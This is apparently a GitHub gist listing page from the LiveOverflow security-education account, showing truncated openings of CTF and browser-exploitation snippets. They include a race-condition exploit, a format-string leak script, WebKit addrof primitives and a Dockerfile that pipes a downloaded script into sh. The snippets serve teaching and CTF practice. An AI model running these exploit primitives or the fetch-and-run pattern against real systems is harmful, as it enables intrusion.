LiveOverflow

@LiveOverflow
LiveOverflow / forwarder.py
Created February 17, 2023 15:19
TCP Forwarder
import socket
import select
from logzero import logger
# python forwarder.py localhost:1337 ipinfo.io:80
# curl -v http://localhost.com:1337 -H "Host: ipinfo.io"
# video: https://www.youtube.com/watch?v=32KKwgF67Ho
class Forwarder:
@LiveOverflow
LiveOverflow / hireme.ipynb
Created November 20, 2020 10:46
Hire me!!!!!!!!
@LiveOverflow
LiveOverflow / readflag.c
Created December 18, 2019 01:30
File Path Race Condition
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>
// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c
int main(int argc, char *argv[]) {
@LiveOverflow
LiveOverflow / asd.py
Last active May 5, 2023 19:38
C Application Firewall
import struct
import socket
s = socket.socket()
s.connect(('127.0.0.1', 1337))
r = s.recv(1024)
s.send("%p,%p,%p\n")
while ',' not in r:
r = s.recv(1024)
start_buf = int(r.split(',')[1], 16)-9
@LiveOverflow
LiveOverflow / test.js
Last active October 17, 2023 16:42
Revisiting JavaScriptCore Internals: boxed vs. unboxed - browser 0x06
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
@LiveOverflow
LiveOverflow / test.js
Created June 22, 2019 23:12
Browser Exploitation - browser 0x05
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
@LiveOverflow
LiveOverflow / test.js
Last active June 22, 2019 23:09
Browser Exploitation - browser 0x04
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
@LiveOverflow
LiveOverflow / Dockerfile
Created May 18, 2019 10:11
ubuntu:18.04 CTF Docker
FROM ubuntu:18.04
ENV LC_CTYPE C.UTF-8
RUN apt-get update && apt-get install -y strace ltrace curl wget gcc net-tools vim gdb python python3 python3-pip wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev python-pip && (wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh) && pip install capstone && mkdir tools && cd tools && git clone https://github.com/JonathanSalwan/ROPgadget && pip3 install keystone-engine && pip3 install unicorn && pip3 install capstone && pip3 install ropper && pip3 install keystone-engine && pip install requests && pip install pwn && git clone https://github.com/radare/radare2 && cd radare2 && sys/install.sh && pip install r2pipe && dpkg --add-architecture i386 && apt update && apt install -y libc6:i386 libncurses5:i386 libstdc++6:i386 && wget https://developer.arm.com/-/media/Files/downloads/gnu-rm/7-2018q2/gcc-arm-none-eabi-7-2018-q2-update-linux.tar.bz2?revision=bc2c96c0-14b5-4bb4-9f18-bceb4050fee7?product=GNU%20Arm%20Embedded%20Toolchain,64-bit,,Lin
@LiveOverflow
LiveOverflow / fuzz.html
Created April 7, 2019 10:35
Fuzz innerHTML vs. DOMParser
<html>
<body>
<script>
const tags = ["a", "abbr", "address", "area", "article", "aside", "audio", "b", "base", "bdi", "bdo", "blockquote", "body", "br", "button", "canvas", "caption", "cite", "code", "col", "colgroup", "data", "datalist", "dd", "del", "details", "dfn", "dialog", "div", "dl", "dt", "em", "embed", "fieldset", "figcaption", "figure", "footer", "form", "h1", "h2", "h3", "h4", "h5", "h6", "head", "header", "hgroup", "hr", "html", "i", "iframe", "img", "input", "ins", "kbd", "keygen", "label", "legend", "li", "link", "main", "map", "mark", "math", "menu", "menuitem", "meta", "meter", "nav", "noscript", "object", "ol", "optgroup", "option", "output", "p", "param", "picture", "pre", "progress", "q", "rb", "rp", "rt", "rtc", "ruby", "s", "samp", "script", "section", "select", "slot", "small", "source", "span", "strong", "style", "sub", "summary", "sup", "svg", "table", "tbody", "td", "template", "textarea", "tfoot", "th", "thead", "time", "title", "tr", "track", "u", "ul", "var", "video", "wbr"]
@LiveOverflow
LiveOverflow / AcoraidaMonicaGame.sol
Last active February 10, 2024 13:13
Acoraida Monica
pragma solidity =0.4.25;
contract AcoraidaMonicaGame{
uint256 public version = 4;
string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
string public constant sampleQuestion = "Who is Acoraida Monica?";
string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D";
Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
address questioner;
string public question;